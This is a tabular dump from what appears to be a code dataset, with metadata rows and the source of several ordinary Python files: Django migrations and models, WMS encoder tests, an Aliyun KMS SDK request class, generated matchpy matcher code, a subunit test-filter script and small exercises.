blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d2dded48a1d604bda8edaeb28fbb63865106133a
|
e406487b60cf9a220c4164a2e6f6e612ec98843f
|
/mall/apps/goods/migrations/0002_auto_20190117_1555.py
|
7fdd947712c4473763b67eca18cb03688ec0a703
|
[] |
no_license
|
L-huihui/duoduo
|
3d7caad17664b045882043afacb3dcbc13008fb2
|
16bb64e1216a82a35867516e4351dffe68247415
|
refs/heads/master
| 2020-04-18T05:49:21.281388
| 2019-01-25T01:44:29
| 2019-01-25T01:44:29
| 167,293,055
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,655
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-01-17 07:55
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('goods', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='brand',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='goods',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='goodscategory',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='goodschannel',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='goodsspecification',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='sku',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='skuimage',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='skuspecification',
old_name='updata_time',
new_name='update_time',
),
migrations.RenameField(
model_name='specificationoption',
old_name='updata_time',
new_name='update_time',
),
]
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
0ba8e6cf08ec403a39f4114cd07dae91ac4183bf
|
f572e0a4b843ed3fd2cd8edec2ad3aab7a0019d3
|
/ows/wms/v13/test_encoders.py
|
d57cc1d1d58cfd386dcf9b086e8f9df557098abf
|
[
"MIT"
] |
permissive
|
EOxServer/pyows
|
9039c8ed7358c98d736e2b8fd9f47be944f0b0a1
|
e09310f992d6e69088940e9b5dbd7302f697344b
|
refs/heads/master
| 2022-10-09T23:27:43.884159
| 2022-10-04T10:03:25
| 2022-10-04T10:03:25
| 218,005,699
| 1
| 1
| null | 2022-01-04T13:36:06
| 2019-10-28T09:01:51
|
Python
|
UTF-8
|
Python
| false
| false
| 7,902
|
py
|
# -------------------------------------------------------------------------------
#
# Project: pyows <http://eoxserver.org>
# Authors: Fabian Schindler <fabian.schindler@eox.at>
#
# -------------------------------------------------------------------------------
# Copyright (C) 2019 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -------------------------------------------------------------------------------
from datetime import datetime, timedelta
from ows.util import Version, year, month
from ows.common.types import WGS84BoundingBox, BoundingBox
from ..types import (
ServiceCapabilities, FormatOnlineResource, Layer, Style, LegendURL,
Dimension, Range,
GetMapRequest, GetFeatureInfoRequest
)
from .encoders import xml_encode_capabilities, kvp_encode_get_map_request
def test_encode_capabilities():
capabilities = ServiceCapabilities()
print(xml_encode_capabilities(capabilities, pretty_print=True).value.decode('utf-8'))
capabilities = ServiceCapabilities.with_defaults(
'http://provider.org',
['image/png', 'image/jpeg'],
['text/html', 'application/json'],
update_sequence='2018-05-08',
title='Title',
abstract='Description',
keywords=[
'test', 'WMS',
],
fees='None',
access_constraints=['None'],
provider_name='Provider Inc',
provider_site='http://provider.org',
individual_name='John Doe',
organisation_name='Provider Inc',
position_name='CTO',
phone_voice='+99/9008820',
phone_facsimile='+99/9008821',
delivery_point='Point du Hoc',
city='City',
administrative_area='Adminity',
postal_code='12345',
country='Cooontry',
electronic_mail_address='john.doe@provider.org',
online_resource='http://provider.org',
hours_of_service='09:00AM - 18:00PM',
contact_instructions='Just send a mail or a carrier pidgeon',
role='Chief',
layer=Layer(
title='root layer',
abstract='Some abstract',
keywords=['Root', 'right?'],
crss=['EPSG:4326', 'EPSG:3857'],
wgs84_bounding_box=WGS84BoundingBox([-180, -90, 180, 90]),
bounding_boxes=[
BoundingBox('EPSG:3857', [
-20026376.39, -20048966.10,
20026376.39, 20048966.10,
])
],
attribution='root attribution',
authority_urls={
'root-auth': 'http://provider.org',
},
identifiers={
'root-auth': 'myId',
},
metadata_urls=[
FormatOnlineResource(
format='text/xml',
href='http://provider.com/metadata.xml',
)
],
data_urls=[
FormatOnlineResource(
format='image/tiff',
href='http://provider.com/data.tif',
)
],
min_scale_denominator=5,
max_scale_denominator=10,
layers=[
Layer(
name='sublayer',
title='My Sub-layer',
queryable=True,
styles=[
Style(
name='styli',
title='Styli',
abstract='stylisch Style',
legend_urls=[
LegendURL(
width=500,
height=300,
format='image/jpeg',
href='http://provider.com/legend.jpg',
)
],
style_sheet_url=FormatOnlineResource(
'text/xml',
href='http://provider.com/stylesheet.xml',
),
style_url=FormatOnlineResource(
'text/xml',
href='http://provider.com/style.xml',
)
)
],
dimensions=[
Dimension(
name='time',
units='seconds',
values=Range(
datetime(2018, 5, 10),
datetime(2018, 5, 12),
timedelta(hours=1),
),
unit_symbol='s',
default='',
multiple_values=False,
nearest_value=True,
current=False
),
Dimension(
name='elevation',
units='meters',
values=[5, 10, 500, 1000, 15000],
unit_symbol='m',
default='',
multiple_values=False,
nearest_value=True,
current=False
)
]
)
]
),
)
# print(xml_encode_capabilities(capabilities, pretty_print=True).value.decode('utf-8'))
def test_encode_getmap():
print(kvp_encode_get_map_request(GetMapRequest(
Version(1, 3, 0),
layers=['a', 'b', 'c'],
styles=['s1', 's2', None],
bounding_box=BoundingBox('EPSG:4326', [0, 0, 10, 10]),
width=256,
height=256,
format='image/jpeg',
dimensions={}
)))
print(kvp_encode_get_map_request(GetMapRequest(
Version(1, 3, 0),
layers=['a', 'b', 'c'],
styles=['s1', 's2', None],
bounding_box=BoundingBox('EPSG:4326', [0, 0, 10, 10]),
width=256,
height=256,
format='image/jpeg',
time=Range(year(2012), year(2013)),
elevation=1000,
dimensions={
'wavelength': '2456.2',
'pressure': ['123', '234'],
'range': [Range('0', '1'), Range('2', '4')]
}
)))
def test_encode_getfeatureinfo():
GetFeatureInfoRequest(
Version(1, 3, 0),
layers=['a', 'b', 'c'],
styles=['s1', 's2', None],
bounding_box=BoundingBox('EPSG:4326', [0, 0, 10, 10]),
width=256,
height=256,
format='image/jpeg',
dimensions={},
query_layers=['a', 'b'],
info_format='text/xml',
i=12,
j=12,
feature_count=15,
)
|
[
"fabian.schindler.strauss@gmail.com"
] |
fabian.schindler.strauss@gmail.com
|
b72ad75306f31160948715d6656aedb45e1792c7
|
e2e993962d6e5e30905d13f0532acdac9302c84b
|
/HTL.tab/Test.panel/Test.pushbutton/keyman/keyman/keys/models.py
|
a35c8dcb63e577c0174f8f38772822ae3ef1b000
|
[
"MIT"
] |
permissive
|
htlcnn/pyrevitscripts
|
a1777fa0ba36003443d95e0f9fbbcadc4ffa5fe7
|
b898a3a5e8d212570254772ae314f343498b1398
|
refs/heads/master
| 2021-01-01T20:08:31.001558
| 2018-01-11T06:44:26
| 2018-01-11T06:44:26
| 98,773,971
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
from django.db import models
from django.core.urlresolvers import reverse
class Software(models.Model):
name = models.CharField(max_length=200)
def __unicode__(self):
return self.name
def get_absolute_url(self):
return reverse('software_edit', kwargs={'pk': self.pk})
|
[
"hoangthanhlong@gmail.com"
] |
hoangthanhlong@gmail.com
|
849cad464c0731a0afd6cb94a57fdc9007ce5036
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/2122.py
|
c31ad8bdbc94a1aa0c0f79101990a413684bb5df
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
def resolve_case():
num = int(input())
num_list = list(str(num))
assend_index = 0
same=1
for assend_index in range(1, len(num_list)):
if num_list[assend_index - 1] > num_list[assend_index]:
break;
elif num_list[assend_index - 1] == num_list[assend_index]:
same += 1
else:
same = 1
print("".join(num_list[:assend_index-same]), end="")
num_list_tmp = num_list[assend_index-same:]
num_list_sorted = num_list[assend_index-same:]
num_list_sorted.sort()
length = len(num_list_tmp)
for x in range(0, length):
if num_list_tmp[x] is num_list_sorted[x]:
print(num_list_tmp[x], end="")
else:
print(int(str(int(num_list_tmp[x]) - 1) + ("9" * (length - x - 1))), end="")
break
return
cases = int(input())
for case in range(0, cases):
print("Case #" + str(case + 1), end=": ")
resolve_case()
print()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d03578c423b75b0a881d10b32f169ad9a5075cbb
|
f445450ac693b466ca20b42f1ac82071d32dd991
|
/generated_tempdir_2019_09_15_163300/generated_part005394.py
|
e5781c7991690423aaa123393d0e5d46def81e37
|
[] |
no_license
|
Upabjojr/rubi_generated
|
76e43cbafe70b4e1516fb761cabd9e5257691374
|
cd35e9e51722b04fb159ada3d5811d62a423e429
|
refs/heads/master
| 2020-07-25T17:26:19.227918
| 2019-09-15T15:41:48
| 2019-09-15T15:41:48
| 208,357,412
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,559
|
py
|
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher33668(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({0: 1, 1: 1}), [
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 0
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher33668._instance is None:
CommutativeMatcher33668._instance = CommutativeMatcher33668()
return CommutativeMatcher33668._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 33667
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 33669
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.2.2.2.1', tmp3)
except ValueError:
pass
else:
pass
# State 33670
if len(subjects2) >= 1:
tmp5 = subjects2.popleft()
subst2 = Substitution(subst1)
try:
subst2.try_add_variable('i2.2.1.2.2.2.2', tmp5)
except ValueError:
pass
else:
pass
# State 33671
if len(subjects2) == 0:
pass
# State 33672
if len(subjects) == 0:
pass
# 0: x**m
yield 0, subst2
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
if len(subjects) >= 1 and isinstance(subjects[0], Add):
tmp7 = subjects.popleft()
associative1 = tmp7
associative_type1 = type(tmp7)
subjects8 = deque(tmp7._args)
matcher = CommutativeMatcher33674.get()
tmp9 = subjects8
subjects8 = []
for s in tmp9:
matcher.add_subject(s)
for pattern_index, subst1 in matcher.match(tmp9, subst0):
pass
if pattern_index == 0:
pass
# State 33691
if len(subjects) == 0:
pass
# 1: f + e*x**r
yield 1, subst1
subjects.appendleft(tmp7)
return
yield
from matchpy.matching.many_to_one import CommutativeMatcher
from collections import deque
from .generated_part005395 import *
from matchpy.utils import VariableWithCount
from multiset import Multiset
|
[
"franz.bonazzi@gmail.com"
] |
franz.bonazzi@gmail.com
|
0e7ff815cea27a8a05cb59b0e158e66ee68977ce
|
1896685500833ba2e4e25400a03e10536dc57ad5
|
/apimpe/wsgi.py
|
7ebc7b896b1a99ceded6af9f77e7fbd203d23e58
|
[] |
no_license
|
Oswaldinho24k/MPE-API
|
04e5d134199083300c2eac2b2d21e206e4306eeb
|
2e1d7b282f994867c04d31b09395785d73d90b9d
|
refs/heads/master
| 2020-06-21T14:53:18.903127
| 2016-12-02T18:57:25
| 2016-12-02T18:57:25
| 74,783,930
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
"""
WSGI config for apimpe project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apimpe.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
|
[
"oswalfut_96@hotmail.com"
] |
oswalfut_96@hotmail.com
|
2dc917a66e8ef838946a5fcb757890bce77a7963
|
9405aa570ede31a9b11ce07c0da69a2c73ab0570
|
/aliyun-python-sdk-kms/aliyunsdkkms/request/v20160120/GenerateDataKeyWithoutPlaintextRequest.py
|
681ae27d16cff738aea6473faf406f81efbeea7d
|
[
"Apache-2.0"
] |
permissive
|
liumihust/aliyun-openapi-python-sdk
|
7fa3f5b7ea5177a9dbffc99e73cf9f00e640b72b
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
refs/heads/master
| 2020-09-25T12:10:14.245354
| 2019-12-04T14:43:27
| 2019-12-04T14:43:27
| 226,002,339
| 1
| 0
|
NOASSERTION
| 2019-12-05T02:50:35
| 2019-12-05T02:50:34
| null |
UTF-8
|
Python
| false
| false
| 2,008
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkkms.endpoint import endpoint_data
class GenerateDataKeyWithoutPlaintextRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Kms', '2016-01-20', 'GenerateDataKeyWithoutPlaintext','kms')
self.set_protocol_type('https')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_EncryptionContext(self):
return self.get_query_params().get('EncryptionContext')
def set_EncryptionContext(self,EncryptionContext):
self.add_query_param('EncryptionContext',EncryptionContext)
def get_KeyId(self):
return self.get_query_params().get('KeyId')
def set_KeyId(self,KeyId):
self.add_query_param('KeyId',KeyId)
def get_KeySpec(self):
return self.get_query_params().get('KeySpec')
def set_KeySpec(self,KeySpec):
self.add_query_param('KeySpec',KeySpec)
def get_NumberOfBytes(self):
return self.get_query_params().get('NumberOfBytes')
def set_NumberOfBytes(self,NumberOfBytes):
self.add_query_param('NumberOfBytes',NumberOfBytes)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
f6f69bd11a57079c1e860e060690db08820b94e3
|
67553d46a257631810f394908013b82c337e0fbd
|
/goat/chapter05/5.2/globals_test.py
|
cc3a84eb474eb4feacb54ede07ac205a359b442a
|
[] |
no_license
|
bopopescu/goat-python
|
3f9d79eb1a9c2733345d699c98d82f91968ca5fa
|
c139488e2b5286033954df50ae1ca834144446f5
|
refs/heads/master
| 2022-11-21T11:25:27.921210
| 2020-03-06T01:02:57
| 2020-03-06T01:02:57
| 281,066,748
| 0
| 0
| null | 2020-07-20T09:00:08
| 2020-07-20T09:00:08
| null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
# coding: utf-8
name = 'Charlie'
def test ():
# 直接访问name全局变量
print(name) # Charlie
name = '孙悟空'
test()
print(name)
|
[
"34465021+jwfl724168@users.noreply.github.com"
] |
34465021+jwfl724168@users.noreply.github.com
|
51719366dd3b45e9da2070caf4e1ca0906df0c1b
|
24d8cf871b092b2d60fc85d5320e1bc761a7cbe2
|
/eXe/rev2283-2409/base-trunk-2283/prototype/pyfox/setup.py
|
58da3fb0318bb0b263de8f582d9d2d07804158ca
|
[] |
no_license
|
joliebig/featurehouse_fstmerge_examples
|
af1b963537839d13e834f829cf51f8ad5e6ffe76
|
1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad
|
refs/heads/master
| 2016-09-05T10:24:50.974902
| 2013-03-28T16:28:47
| 2013-03-28T16:28:47
| 9,080,611
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,325
|
py
|
import os
from distutils.core import setup, Extension
Moz="/home/djm/work/firefox/mozilla"
MozDist=Moz+"/dist"
setup(name='pyfoxutil',
version='1.0',
ext_modules=[Extension('_pyfoxutil', ['pyfoxutil.cpp'],
include_dirs=[MozDist+"/include/embed_base",
MozDist+"/include/string",
MozDist+"/include/xpcom",
MozDist+"/include/widget",
MozDist+"/include/nspr",
MozDist+"/include/gfx",
MozDist+"/include/webbrwsr",
MozDist+"/include/uriloader",
Moz+"/extensions/python/xpcom/src",
],
library_dirs = [Moz+"/extensions/python/xpcom/src",
MozDist+"/lib"],
libraries = ["nspr4", "plc4", "plds4",
"xpcomcomponents_s",
"embed_base_s", "_xpcom",
])
],
)
|
[
"joliebig@fim.uni-passau.de"
] |
joliebig@fim.uni-passau.de
|
59cee6f8de1719cbc71645dcc02d79317246d9ea
|
ce083128fa87ca86c65059893aa8882d088461f5
|
/python/python-salad-bdd/.venv/bin/subunit-filter
|
317293fe0fb7c7007d0cf0b7e77ec7d6c6da347c
|
[] |
no_license
|
marcosptf/fedora
|
581a446e7f81d8ae9a260eafb92814bc486ee077
|
359db63ff1fa79696b7bc803bcfa0042bff8ab44
|
refs/heads/master
| 2023-04-06T14:53:40.378260
| 2023-03-26T00:47:52
| 2023-03-26T00:47:52
| 26,059,824
| 6
| 5
| null | 2022-12-08T00:43:21
| 2014-11-01T18:48:56
| null |
UTF-8
|
Python
| false
| false
| 7,071
|
#!/home/marcosptf/developer/python-bdd/.venv/bin/python2
# subunit: extensions to python unittest to get test results from subprocesses.
# Copyright (C) 200-2013 Robert Collins <robertc@robertcollins.net>
# (C) 2009 Martin Pool
#
# Licensed under either the Apache License, Version 2.0 or the BSD 3-clause
# license at the users choice. A copy of both licenses are available in the
# project source as Apache-2.0 and BSD. You may not use this file except in
# compliance with one of these two licences.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# license you chose for the specific language governing permissions and
# limitations under that license.
#
"""Filter a subunit stream to include/exclude tests.
The default is to strip successful tests.
Tests can be filtered by Python regular expressions with --with and --without,
which match both the test name and the error text (if any). The result
contains tests which match any of the --with expressions and none of the
--without expressions. For case-insensitive matching prepend '(?i)'.
Remember to quote shell metacharacters.
"""
from optparse import OptionParser
import sys
import re
from testtools import ExtendedToStreamDecorator, StreamToExtendedDecorator
from subunit import (
DiscardStream,
ProtocolTestCase,
StreamResultToBytes,
read_test_list,
)
from subunit.filters import filter_by_result, find_stream
from subunit.test_results import (
and_predicates,
make_tag_filter,
TestResultFilter,
)
def make_options(description):
parser = OptionParser(description=__doc__)
parser.add_option("--error", action="store_false",
help="include errors", default=False, dest="error")
parser.add_option("-e", "--no-error", action="store_true",
help="exclude errors", dest="error")
parser.add_option("--failure", action="store_false",
help="include failures", default=False, dest="failure")
parser.add_option("-f", "--no-failure", action="store_true",
help="exclude failures", dest="failure")
parser.add_option("--passthrough", action="store_false",
help="Forward non-subunit input as 'stdout'.", default=False,
dest="no_passthrough")
parser.add_option("--no-passthrough", action="store_true",
help="Discard all non subunit input.", default=False,
dest="no_passthrough")
parser.add_option("-s", "--success", action="store_false",
help="include successes", dest="success")
parser.add_option("--no-success", action="store_true",
help="exclude successes", default=True, dest="success")
parser.add_option("--no-skip", action="store_true",
help="exclude skips", dest="skip")
parser.add_option("--xfail", action="store_false",
help="include expected failures", default=True, dest="xfail")
parser.add_option("--no-xfail", action="store_true",
help="exclude expected failures", default=True, dest="xfail")
parser.add_option(
"--with-tag", type=str,
help="include tests with these tags", action="append", dest="with_tags")
parser.add_option(
"--without-tag", type=str,
help="exclude tests with these tags", action="append", dest="without_tags")
parser.add_option("-m", "--with", type=str,
help="regexp to include (case-sensitive by default)",
action="append", dest="with_regexps")
parser.add_option("--fixup-expected-failures", type=str,
help="File with list of test ids that are expected to fail; on failure "
"their result will be changed to xfail; on success they will be "
"changed to error.", dest="fixup_expected_failures", action="append")
parser.add_option("--without", type=str,
help="regexp to exclude (case-sensitive by default)",
action="append", dest="without_regexps")
parser.add_option("-F", "--only-genuine-failures", action="callback",
callback=only_genuine_failures_callback,
help="Only pass through failures and exceptions.")
parser.add_option("--rename", action="append", nargs=2,
help="Apply specified regex subsitutions to test names.",
dest="renames", default=[])
return parser
def only_genuine_failures_callback(option, opt, value, parser):
parser.rargs.insert(0, '--no-passthrough')
parser.rargs.insert(0, '--no-xfail')
parser.rargs.insert(0, '--no-skip')
parser.rargs.insert(0, '--no-success')
def _compile_re_from_list(l):
return re.compile("|".join(l), re.MULTILINE)
def _make_regexp_filter(with_regexps, without_regexps):
"""Make a callback that checks tests against regexps.
with_regexps and without_regexps are each either a list of regexp strings,
or None.
"""
with_re = with_regexps and _compile_re_from_list(with_regexps)
without_re = without_regexps and _compile_re_from_list(without_regexps)
def check_regexps(test, outcome, err, details, tags):
"""Check if this test and error match the regexp filters."""
test_str = str(test) + outcome + str(err) + str(details)
if with_re and not with_re.search(test_str):
return False
if without_re and without_re.search(test_str):
return False
return True
return check_regexps
def _compile_rename(patterns):
def rename(name):
for (from_pattern, to_pattern) in patterns:
name = re.sub(from_pattern, to_pattern, name)
return name
return rename
def _make_result(output, options, predicate):
"""Make the result that we'll send the test outcomes to."""
fixup_expected_failures = set()
for path in options.fixup_expected_failures or ():
fixup_expected_failures.update(read_test_list(path))
return StreamToExtendedDecorator(TestResultFilter(
ExtendedToStreamDecorator(
StreamResultToBytes(output)),
filter_error=options.error,
filter_failure=options.failure,
filter_success=options.success,
filter_skip=options.skip,
filter_xfail=options.xfail,
filter_predicate=predicate,
fixup_expected_failures=fixup_expected_failures,
rename=_compile_rename(options.renames)))
def main():
parser = make_options(__doc__)
(options, args) = parser.parse_args()
regexp_filter = _make_regexp_filter(
options.with_regexps, options.without_regexps)
tag_filter = make_tag_filter(options.with_tags, options.without_tags)
filter_predicate = and_predicates([regexp_filter, tag_filter])
filter_by_result(
lambda output_to: _make_result(sys.stdout, options, filter_predicate),
output_path=None,
passthrough=(not options.no_passthrough),
forward=False,
protocol_version=2,
input_stream=find_stream(sys.stdin, args))
sys.exit(0)
if __name__ == '__main__':
main()
|
[
"marcosptf@yahoo.com.br"
] |
marcosptf@yahoo.com.br
|
|
56543401f8fff6de82cf72f6710a4d11cd322f0f
|
265a07a2becd232b292872d1d7136789463874be
|
/lei练习/child.py
|
a18eb14e18c20325173e5d20365a90e17db5663c
|
[] |
no_license
|
Lz0224/Python-exercise
|
f4918b8cd5f7911f0c35c0458c2269959937d07d
|
3d09f54aebc653f4a5b36765b25c7241e3960764
|
refs/heads/master
| 2020-12-24T22:20:55.573019
| 2017-08-11T07:18:16
| 2017-08-11T07:18:16
| 100,005,776
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
#!/usr/bin/python
#coding=utf-8
class ParentClass(object):
"""docstring for ParentClass."""
name = "老张"
# def __init__(self, arg):
# super(ParentClass, self).__init__()
# self.arg = arg
def fun(self):
print "老子有钱"
class ChildClass(ParentClass):
"""这是什么玩意。。。。"""
# def __init__(self, arg):
# super(, self).__init__()
# self.arg = arg
def fun1(self):
print "哥也有钱"
class GrentChildClass(ChildClass):
pass
child = ChildClass()
print child.name
child.fun()
grent_child = GrentChildClass()
print grent_child.name
print dir(ParentClass)
print ChildClass.__doc__
|
[
"Lz0o_o0@outlook.com"
] |
Lz0o_o0@outlook.com
|
374a204faa07f80ad6187a04e03dc1f385ef9168
|
7619aed8a311e2832634379762c373886f4354fb
|
/trace_pox_eel_l2_multi-BinaryLeafTreeTopology1-steps200/interactive_replay_config.py
|
642e4a4db5b05f5ecefc4f4ffd682ee68f5bc5b3
|
[] |
no_license
|
jmiserez/sdnracer-traces
|
b60f8588277c4dc2dad9fe270c05418c47d229b3
|
8991eee19103c8ebffd6ffe15d88dd8c25e1aad5
|
refs/heads/master
| 2021-01-21T18:21:32.040221
| 2015-12-15T14:34:46
| 2015-12-15T14:34:46
| 39,391,225
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,097
|
py
|
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow.interactive_replayer import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd=' ./pox.py --verbose openflow.of_01 --address=__address__ --port=__port__ openflow.discovery forwarding.l2_multi_orig', label='c1', address='127.0.0.1', cwd='/home/ahassany/repos/pox/')],
topology_class=BinaryLeafTreeTopology,
topology_params="num_levels=1",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
ignore_interposition=False,
kill_controllers_on_exit=True)
control_flow = InteractiveReplayer(simulation_config, "traces/trace_pox_eel_l2_multi-BinaryLeafTreeTopology1-steps200/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: ""
|
[
"eahmed@ethz.ch"
] |
eahmed@ethz.ch
|
176869291f6071bba98ea44848936d7ceec24616
|
9b3abcd9c207a015ed611da2a22b48957e46c22d
|
/18_Django框架网站/dailyfresh/apps/user/models.py
|
7d2b0e2c38e7610873de8a89d398099678359f03
|
[] |
no_license
|
it-zyk/PythonCode
|
6e22aff6705d0e66df74a7c43f62f8a3a8f3f70f
|
1ee51edad768ff01ba8542b1ddea05aee533524b
|
refs/heads/master
| 2020-04-23T05:47:33.691995
| 2019-05-08T14:07:34
| 2019-05-08T14:07:34
| 170,951,360
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,596
|
py
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from db.base_model import BaseModel
# Create your models here.
class User(AbstractUser, BaseModel):
'''用户模型类'''
class Meta:
db_table = 'df_user'
verbose_name = '用户'
verbose_name_plural = verbose_name
class AddressManager(models.Manager):
'''地址模型管理器类'''
# 1.改变原有查询的结果集:all()
# 2.封装方法:用户操作模型类对应的数据表(增删改查)
def get_default_address(self, user):
'''获取用户默认收货地址'''
# self.model:获取self对象所在的模型类
try:
address = self.get(user=user, is_default=True) # models.Manager
except self.model.DoesNotExist:
# 不存在默认收货地址
address = None
return address
class Address(BaseModel):
'''地址模型类'''
user = models.ForeignKey('User', verbose_name='所属账户')
receiver = models.CharField(max_length=20, verbose_name='收件人')
addr = models.CharField(max_length=256, verbose_name='收件地址')
zip_code = models.CharField(max_length=6, null=True, verbose_name='邮政编码')
phone = models.CharField(max_length=11, verbose_name='联系电话')
is_default = models.BooleanField(default=False, verbose_name='是否默认')
# 自定义一个模型管理器对象
objects = AddressManager()
class Meta:
db_table = 'df_address'
verbose_name = '地址'
verbose_name_plural = verbose_name
|
[
"it-zyk@outlook.com"
